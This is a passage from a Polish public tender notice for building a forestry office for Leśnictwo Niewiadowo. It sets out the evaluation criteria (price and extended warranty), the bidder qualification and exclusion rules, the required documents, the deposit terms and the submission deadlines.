kryterium Cena ocena ofert zostanie dokonana przy zastosowaniu wzoru: C = Cn/Co x100 pkt x 60 %gdzie:C – liczba punktów w ramach kryterium „Cena”,Cn - najniższa cena spośród ofert ocenianych, Co – cena<br/>oferty ocenianej Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty(załącznik nr 2 do SWZ).W ramach kryterium „Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady” oceniane będzie przyjęcie przez Wykonawcę<br/>zobowiązania umownego do wydłużenia minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady.Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do Wydłużenia minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady w Ofercie (załącznik nr 2 do SWZ) podając ilość miesięcy o jakie zobowiązuje się wydłużyć minimalny (60 miesięczny)okres gwarancji jakości i rękojmi za wady. W ramach kryterium „Wydłużenie minimalnego (60miesięcznego) okresu gwarancji jakości i rękojmi za wady” ocena ofert zostanie dokonana w następujący sposób: a) 40 pkt - otrzyma Wykonawca, który zaoferuje wydłużenie minimalnego<br/>(60miesięcznego) okresu gwarancji jakości i rękojmi za wady o co najmniej 12 miesięcy lub więcej,b) 20pkt otrzyma Wykonawca,który zaoferuje wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady - od 6 do 11 miesięcy,c) 10 punktów otrzyma Wykonawca, który zaoferuje wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady - od 1<br/>do 5miesięcy Wykonawca zamieści informację o liczbie miesięcy o które zobowiązuje się wydłużyć minimalny (60 miesięczny) okres gwarancji jakości i rękojmi za wady w formularzu Oferty (załączniki nr2 do SWZ). Liczba miesięcy wydłużająca minimalny okres gwarancji jakości i rękojmi za wady powinna być wyrażona w pełnych miesiącach (Zamawiający nie dopuszcza wydłużenia okresu<br/>gwarancji przedstawionego nie w pełnych miesiącach np. o 2,5 miesiąca – w takiej sytuacji Zamawiający będzie zaokrąglał do pełnych miesięcy zgodnie z zasadami matematycznymi). Jeżeli Wykonawca w formularzu Oferty (załącznik nr 2 do SWZ) nie wpisze ilości miesięcy o które deklaruje wydłużenie minimalnego okresu gwarancji jakości i rękojmi za wady Zamawiający uzna, że nie deklaruje on wydłużenia podstawowego okresu gwarancji jakości i rękojmi za wady tj. Wykonawca nie otrzyma pkt.w ramach tego kryterium. Jeżeli Wykonawca zaoferuje wydłużenie minimalnego okresu gwarancji jakości i rękojmi za wady o liczbę miesięcy równą zero, Zamawiający przyjmie, iż<br/>zaoferowany został minimalny 60 miesięczny okres gwarancji jakości i rękojmi za wady i przyzna Wykonawcy w niniejszym kryterium 0 punktów. W przypadku zaoferowania liczby miesięcy wydłużających minimalny okres gwarancji jakości i rękojmi za wady jakości więcej niż o 12 miesiące, do oceny w ramach tego kryterium przyjętych zostanie 12 miesięcy oraz przyznana zostanie maksymalna<br/>ilość punktów (tj. 40 pkt.). Natomiast do umowy zostanie wprowadzony okres gwarancji jakości i rękojmi za wady wynikający z Oferty. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający<br/>wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim,Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie minimalnego (60 miesięcznego) okresu gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku zdolności do występowania w obrocie gospodarczym<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>3) sytuacji ekonomicznej lub finansowej. Warunek w odniesieniu do sytuacji ekonomicznej lub finansowej zostanie spełniony jeśli Wykonawca wykaże, że posiada środki lub zdolność kredytową o wartości nie mniejszej niż 200.000,00 zł(słownie: dwieście tysięcy złotych)<br/>4) zdolności technicznej lub zawodowej.a) Warunek w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał: - co najmniej jedną robotę budowlaną polegająca na budowie budynku w technologii drewnianej (o drewnianej konstrukcji ścian, stropów oraz dachu),wyposażonego w instalację elektryczną i wodno-kanalizacyjną o wartości nie mniejszej niż 300000 zł brutto. Wykonawca nie może zsumować wartości, kilku robót o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej.Zamawiający pod pojęciem „budowy” rozumie -wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę,nadbudowę obiektu budowlanego (art. 3 pkt. 6 ustawy Prawo budowlane).Warunek, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 (jedną)osobą na stanowisko kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, wydane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2020 r.poz. 1333 z późn. zm. – „Prawo budowlane”) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej(tekst jedn. Dz. U. z 2020 r., poz. 220 z późn. zm.), które uprawniają do kierowania robotami budowlanymi w zakresie przewidzianym opisem przedmiotu zamówienia. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”,w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9 SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W postęp. mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu w okolicz., o których mowa w art.108 ust. 1 i 109 ust. 1 pkt 1, 4, 8 i 10 .PZP i. Do oferty Wykonawca dołącza aktualne na dzień składania ofert oświad. o braku podstaw do wykluczenia z postęp. zał.nr 3B do SWZ. Zamawiający działając na podstawie art.274ust.1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych.: a)informacji z Krajowego Rejestru Karnego w zakresie:(a) art.108 ust.1 pkt 1 i2 PZP,(b) art.108 ust. 1 pkt 4 PZP, dot. orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,b)oświadczenia Wykonawcy, w zakresie art.108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie<br/>konkurencji i konsumentów(t.jedn. Dz.U.z 2021 r. poz.275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej -(wzór oświadczenia stanowi zał.nr 6 do SWZ),c)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art.109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności, d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.109 ust. 1 pkt 1 PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,e)odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.109 ust.1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, f)oświadczenia Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 PZP (oświad. o braku podstaw do wykluczenia, zał. nr 3B do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art.108 ust. 1 pkt 6 PZP, e) art.109 ust. 1 pkt1 PZP, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12.01.1991 r. o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z2019 r. poz. 1170 z późn. zm.), f) art. 109 ust. 8 i 10 PZP-zał. nr 10 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne nadzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 3A do SWZ które na dzień składania ofert, tymczasowo zastępuje wymagane przez Zamawiającego podmiotowe środki dowodowe.W celu potwierdzenia spełniania warunków udziału w postępowaniu,Zamawiający, działając na podstawie art. 274 ust. 1 ustawy PZP wezwie Wykonawcę,którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 9.2. lit. a), Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, informacji o wykonanych instalacjach (wyposażenia w instalację elektryczną i wodnokanalizacyjną), wartości brutto, terminu wykonania (początku i końca -dzień/miesiąc/rok) i miejsca wykonania oraz podmiotu, na rzecz których roboty te zostały wykonane(wzór wykazu wykonanych robót budowlanych stanowi załącznik nr 7 do SWZ). Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.c) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot.zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie.Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. d) wykazu osób,skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień (numer oraz zakres uprawnień zapewniających prawo wykonywania samodzielnych funkcji technicznych w budownictwie, z<br/>podaniem daty i pełnej podstawy prawnej ich wydania) i zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert wykonawca zobowiązany jest złożyć Zamawiającemu<br/>Ofertę zawierającą: a) formularz Oferty (sporządzony wg wzoru stanowiącego załącznik nr 2 do SWZ)sporządzony pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym b) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio zał.nr 3A do SWZ (oświadczenie o spełnieniu warunków udziału w postępowaniu) i zał. 3B do SWZ (oświadczenie o braku podstaw do wykluczenia), pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez: Wykonawcę, Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile Wykonawcy wspólnie ubiegają się o udzielenie zamówienia);c) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio zał.nr 3C(oświadczenie podmiotu udostępniającego zasoby o spełnieniu warunków udziału w postępowaniu) i zał. 3D (oświadczenie podmiotu udostępniającego zasoby o braku podstaw do wykluczenia) do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu udostępniającego Wykonawcy zasoby na zasadzie określonej w art. 118 PZP, o ile dotyczy,d) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z pkt 9.4. SWZ, jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów; (Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 5 do SWZ),e) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP, jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów,f)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia lub osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118PZP, jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP –działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 13.4. lit e) SWZ, sporządzone w sposób określony w pkt 9.13.-9.22 SWZ, g)oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które roboty budowlane/usługi wykonają poszczególni Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zamawiający zaleca złożenie tego oświadczenia w treści formularza Oferty stanowiącego załącznik nr 2 do SWZ).h) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób<br/>upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości 5800,00 zł.Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2PZP. 2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:1) pieniądzu,2) gwarancjach bankowych,3)<br/>gwarancjach ubezpieczeniowych,4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku BNP PARIBAS nr rachunku 44203000451110000000546490 z dopiskiem: wadium na zabezpieczenie<br/>oferty w postępowaniu na „Budowa samodzielnej kancelarii dla Leśnictwa Niewiadowo pod klucz”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty,<br/>o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6PZP.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2. ppkt 2)- 4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.6. Treść gwarancji wadialnej musi zawierać następujące elementy:1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,2) określenie wierzytelności,która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotuzamówienia3)kwotę gwarancji/poręczenia,4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.7. Zamawiający<br/>zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia(konsorcjum): 1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;2) oferta musi być podpisana w taki sposób,by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 3A do SWZ) oraz oświadczenie o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 3B do SWZ) składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.4) dokumenty, o których mowa w pkt 9.3.SWZ obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzieleniezamówienia5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.8)Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane/usługi, do realizacji których te zdolności są wymagane. W związku z powyższym stosownie do postanowień, o których mowa w art. 117 ust.4 PZP Wykonawca jest zobowiązany dołączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane/usługi wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w formularzu Oferty stanowiącym załącznik nr 2 do SWZ (pkt 6). Zamawiający zaleca złożyć w/w oświadczenie w formularzu Oferty (załącznik nr 2 do SWZ). Pełen i szczegółowy opis zawarty został w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art 455 ust. 1 pkt 1 PZP, przewiduje możliwość<br/>dokonania następujących zmian Umowy: <br/>1. w zakresie zmiany Terminu Wykonania<br/>2. w zakresie zmiany kolejności wykonywania lub zmiany terminów wykonania poszczególnych świadczeń wchodzących w skład Przedmiotu Umowy w stosunku do terminów określonych w Harmonogramie jednakże bez dokonywania zmiany Terminu Wykonania.<br/> 3. w zakresie zmiany sposobu wykonania Przedmiotu Umowy związanej z koniecznością zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych, w szczególności robót zamiennych, <br/>4. W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt 3 będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę. Inicjatorem zmian w Umowie może być każda ze Stron, z tym, że<br/>ostateczna decyzja, co do wprowadzenia zmian i ich zakresu należy do Zamawiającego. Wystąpienie którejkolwiek z okoliczności mogących powodować zmianę umowy, nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian, ani nie może stanowić podstawy do jakichkolwiek roszczeń Wykonawcy do ich dokonania.<br/>5. Pozostałe zmiany: (i) zmiany redakcyjne Umowy oraz (ii) zmiany danych Stron ujawnionych w rejestrach publicznych, nie stanowiących zmiany, o której mowa w art. 455 ust. 1 PZP. Szczegółowy rodzaj i zakres zmian a także warunki wprowadzenia zmian umowy określa złącznik nr 4 do SWZ – projekt<br/>umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złozyć za pośrednictwem platformy SmartPZP - https://portal.smartpzp.pl/goleniow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-28 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej zamiast: 1) informacji z Krajowego Rejestru Karnego, o której mowa w pkt 9.3. lit. a)SWZ - składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,w zakresie określonym w pkt 9.3. lit a) SWZ, 2)zaświadczenia, o którym mowa w pkt 9.3. lit c)SWZ, zaświadczenia albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na 